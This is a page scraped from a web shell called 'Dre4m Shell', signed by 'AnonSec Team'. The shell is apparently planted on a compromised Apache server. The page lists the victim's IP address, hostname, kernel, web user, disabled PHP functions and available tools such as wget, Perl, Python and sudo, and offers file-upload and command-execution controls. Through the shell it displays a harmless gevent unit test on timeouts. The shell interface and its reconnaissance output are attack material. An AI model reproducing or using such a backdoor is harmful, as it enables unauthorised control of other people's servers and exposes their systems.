Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.226.187.224
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests/test__hub_join_timeout.py
import functools
import unittest

import gevent
import gevent.core
from gevent.event import Event

from gevent.testing.testcase import TimeAssertMixin

SMALL_TICK = 0.05

# setting up signal does not affect join()
gevent.signal(1, lambda: None)  # wouldn't work on windows


def repeated(func, repetitions=2):
    @functools.wraps(func)
    def f(self):
        for _ in range(repetitions):
            func(self)
    return f

class Test(TimeAssertMixin, unittest.TestCase):

    @repeated
    def test_callback(self):
        # exiting because the spawned greenlet finished execution (spawn (=callback) variant)
        x = gevent.spawn(lambda: 5)
        with self.runs_in_no_time():
            result = gevent.wait(timeout=10)
        self.assertTrue(result)
        self.assertTrue(x.dead, x)
        self.assertEqual(x.value, 5)

    @repeated
    def test_later(self):
        # exiting because the spawned greenlet finished execution (spawn_later (=timer) variant)
        x = gevent.spawn_later(SMALL_TICK, lambda: 5)
        with self.runs_in_given_time(SMALL_TICK):
            result = gevent.wait(timeout=10)
        self.assertTrue(result)
        self.assertTrue(x.dead, x)

    @repeated
    def test_timeout(self):
        # exiting because of timeout (the spawned greenlet still runs)
        x = gevent.spawn_later(10, lambda: 5)
        with self.runs_in_given_time(SMALL_TICK):
            result = gevent.wait(timeout=SMALL_TICK)
        self.assertFalse(result)
        self.assertFalse(x.dead, x)
        x.kill()
        with self.runs_in_no_time():
            result = gevent.wait()

        self.assertTrue(result)

    @repeated
    def test_event(self):
        # exiting because of event (the spawned greenlet still runs)
        x = gevent.spawn_later(10, lambda: 5)
        event = Event()
        event_set = gevent.spawn_later(SMALL_TICK, event.set)
        with self.runs_in_given_time(SMALL_TICK):
            result = gevent.wait([event])
        self.assertEqual(result, [event])
        self.assertFalse(x.dead, x)
        self.assertTrue(event_set.dead)
        self.assertTrue(event.is_set)
        x.kill()
        with self.runs_in_no_time():
            result = gevent.wait()

        self.assertTrue(result)

    @repeated
    def test_ref_arg(self):
        # checking "ref=False" argument
        gevent.get_hub().loop.timer(10, ref=False).start(lambda: None)
        with self.runs_in_no_time():
            result = gevent.wait()
        self.assertTrue(result)

    @repeated
    def test_ref_attribute(self):
        # checking "ref=False" attribute
        w = gevent.get_hub().loop.timer(10)
        w.start(lambda: None)
        w.ref = False
        with self.runs_in_no_time():
            result = gevent.wait()
        self.assertTrue(result)


class TestAgain(Test):
    "Repeat the same tests"

if __name__ == '__main__':
    unittest.main()

Anon7 - 2022
AnonSec Team